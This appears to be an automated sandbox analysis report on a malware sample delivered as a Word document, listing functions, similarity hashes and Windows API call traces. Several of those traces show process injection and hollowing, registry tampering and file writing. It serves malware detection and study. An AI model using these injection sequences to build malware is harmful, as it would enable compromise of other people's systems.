    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E32C5, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: 251287.exe Analysis ID: 544867

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:164138344D25F82E73E5E2EDB810187B
Total matches:31
Initial Analysis Report:Open
Initial sample Analysis ID:544867
Initial sample SHA 256:1C63CA41136F1CBE7E2E541D92D6B3EB70A79374F172FBD7157DA4018BFEB8D2
Initial sample name:THE_HARRION_LAW_FIRM_Request.doc

Similar Executed Functions

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
